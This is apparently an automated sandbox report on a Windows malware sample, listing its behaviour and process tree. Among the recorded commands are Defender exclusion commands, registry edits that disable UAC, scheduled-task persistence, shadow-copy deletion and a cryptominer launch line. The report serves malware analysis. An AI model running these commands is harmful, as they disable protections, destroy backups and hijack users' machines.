c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Idle.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Idle.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIdle.exepowershell.exeAppLaunch.exepowershell.exem.exepid process 1972 ec50388a69792d133c1298e1dceb40a6.exe 1972 ec50388a69792d133c1298e1dceb40a6.exe 1972 ec50388a69792d133c1298e1dceb40a6.exe 1972 ec50388a69792d133c1298e1dceb40a6.exe 1972 ec50388a69792d133c1298e1dceb40a6.exe 1972 ec50388a69792d133c1298e1dceb40a6.exe 588 powershell.exe 1908 powershell.exe 1656 powershell.exe 1900 powershell.exe 920 powershell.exe 808 powershell.exe 1184 powershell.exe 692 powershell.exe 1920 powershell.exe 580 powershell.exe 1936 powershell.exe 840 powershell.exe 1288 powershell.exe 428 powershell.exe 1564 powershell.exe 2008 powershell.exe 1660 powershell.exe 1156 powershell.exe 2012 powershell.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe 3008 powershell.exe 1564 AppLaunch.exe 2172 powershell.exe 1596 m.exe 1596 m.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIdle.exevssvc.exem.exepowershell.exevssvc.exepowershell.exedescription pid process Token: SeDebugPrivilege 1972 ec50388a69792d133c1298e1dceb40a6.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeDebugPrivilege 920 powershell.exe Token: SeDebugPrivilege 808 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 840 powershell.exe Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 428 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2536 Idle.exe Token: SeBackupPrivilege 2872 vssvc.exe Token: SeRestorePrivilege 2872 vssvc.exe Token: SeAuditPrivilege 2872 vssvc.exe Token: SeDebugPrivilege 1596 m.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeBackupPrivilege 2164 vssvc.exe Token: SeRestorePrivilege 2164 vssvc.exe Token: SeAuditPrivilege 2164 vssvc.exe Token: SeDebugPrivilege 2172 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Idle.exepid process 2536 Idle.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exedescription pid process target process PID 1972 wrote to memory of 1908 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1908 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1908 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1908 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 588 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 588 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 588 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 588 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1656 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1656 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1656 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1656 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1564 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1564 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1564 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1564 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1156 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1156 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1156 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1156 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1660 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1660 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1660 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1660 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 840 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 840 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 840 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 840 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1900 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1900 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1900 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1900 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 428 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 428 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 428 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 428 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1184 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1184 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1184 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1184 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 580 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 580 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 580 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 580 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1288 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1288 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1288 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1288 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 1920 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 2008 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 2008 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 2008 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 2008 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 692 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 692 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 692 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe PID 1972 wrote to memory of 692 1972 ec50388a69792d133c1298e1dceb40a6.exe powershell.exe -
System policy modification 1 TTPs 6 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeIdle.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Idle.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"1⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\lsass.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\it-IT\csrss.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\System.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Music\services.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\en-US\System.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\spoolsv.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\csrss.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\fr-FR\System.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\smss.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\smss.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dwm.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Music\System.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\csrss.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Y9JvSKaKi6.bat"2⤵
- Loads dropped DLL
PID:2212 -
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:2300
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵PID:2348
-
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe"C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe"3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:2536 -
C:\Users\Admin\AppData\Local\Temp\m.exe"C:\Users\Admin\AppData\Local\Temp\m.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"5⤵PID:2736
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"6⤵
- Creates scheduled task(s)
PID:2080 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFLLB2JSF2jF32LXcusk7Mo9bvC7o8WbPt.work -p x -t 105⤵PID:1732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1524
-
C:\Users\Admin\AppData\Local\Temp\h.exe"C:\Users\Admin\AppData\Local\Temp\h.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"5⤵
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:1564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet6⤵PID:2552
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:3024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet6⤵PID:316
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\mm.exe"C:\Users\Admin\AppData\Local\Temp\mm.exe"4⤵
- Executes dropped EXE
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1524
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Desktop\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Default\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Windows\Fonts\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Fonts\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\Fonts\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Sidebar\en-US\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\en-US\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276
-
